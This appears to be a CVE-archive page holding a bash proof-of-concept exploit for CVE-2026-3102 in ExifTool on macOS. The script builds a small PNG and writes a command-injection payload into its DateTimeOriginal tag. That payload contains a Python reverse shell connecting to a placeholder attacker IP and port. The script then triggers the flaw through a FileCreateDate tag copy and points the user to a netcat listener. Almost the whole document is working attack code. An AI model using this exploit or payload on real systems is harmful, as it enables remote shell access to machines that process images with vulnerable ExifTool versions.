5465 Total CVEs
26 Years
GitHub
Home / 2026 / CVE-2026-3102
README.md
Rendering markdown...
POC / exiftool_poc.sh SH
⬇ Raw GitHub ✕ Close 
#!/usr/bin/env bash
# =============================================
# ExifTool CVE-2026-3102 Full PoC (macOS)
# Using your exact Python reverse shell payload
# =============================================

DEBUG="${DEBUG:-0}"

dbg() {
    [[ "$DEBUG" == "1" ]] && echo -e "[DEBUG] $*"
}

# ================== CONFIG ==================
KALI_IP="YOUR_ATTACKER_IP_HERE"      # ← CHANGE THIS
KALI_PORT="4444"                     # ← CHANGE THIS
POC_FILEPATH="/tmp/exiftool_pwned"

# Your exact payload (Python reverse shell)
PAYLOAD="'; touch ${POC_FILEPATH}; (echo 'import socket,subprocess,os;s=socket.socket();s.connect((\"${KALI_IP}\",${KALI_PORT}));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call([\"/bin/sh\"])' | python3 &); #"

PATH_TO_EXIFTOOL="${1:-exiftool}"

echo "[+] ExifTool CVE-2026-3102 PoC - Python Reverse Shell"
dbg "Using payload: ${PAYLOAD}"

# Cleanup old files
rm -f "$POC_FILEPATH" benign.png evil.png benign.png_original evil.png_original 2>/dev/null

# =============================================
# 1. Create minimal valid PNG
# =============================================
dbg "[+] Creating 1x1 benign PNG"
{
    printf '\x89\x50\x4E\x47\x0D\x0A\x1A\x0A'
    printf '\x00\x00\x00\x0D\x49\x48\x44\x52\x00\x00\x00\x01\x00\x00\x00\x01\x08\x06\x00\x00\x00\x1F\x15\xC4\x89'
    printf '\x00\x00\x00\x0A\x49\x44\x41\x54\x78\x9C\x63\x00\x01\x00\x00\x05\x00\x01\x0D\x0A\x2D\xB4'
    printf '\x00\x00\x00\x00\x49\x45\x4E\x44\xAE\x42\x60\x82'
} > benign.png

cp benign.png evil.png

# =============================================
# 2. Inject payload into DateTimeOriginal
# =============================================
dbg "[+] Injecting Python reverse shell payload"
$PATH_TO_EXIFTOOL -n -DateTimeOriginal="2026:02:07 ${PAYLOAD}" -overwrite_original ./evil.png

# =============================================
# 3. Trigger the vulnerability
# =============================================
dbg "[+] Triggering RCE via FileCreateDate"
$PATH_TO_EXIFTOOL -n -overwrite_original -tagsFromFile ./evil.png "-FileCreateDate<DateTimeOriginal" benign.png

# =============================================
# 4. Check result
# =============================================
if [[ -f "$POC_FILEPATH" ]]; then
    echo "✅ EXPLOIT SUCCESSFUL!"
    echo "   Proof file created → $POC_FILEPATH"
    ls -l "$POC_FILEPATH"
    echo "   Check your netcat listener for reverse shell!"
else
    echo "❌ Exploit did not succeed."
    echo "   Verify:"
    echo "   • macOS target"
    echo "   • ExifTool ≤ 13.49"
    echo "   • Correct KALI_IP and port"
fi

# Cleanup (keep files if debug mode)
[[ "$DEBUG" != "1" ]] && rm -f benign.png evil.png *_original 2>/dev/null

echo "[+] PoC finished."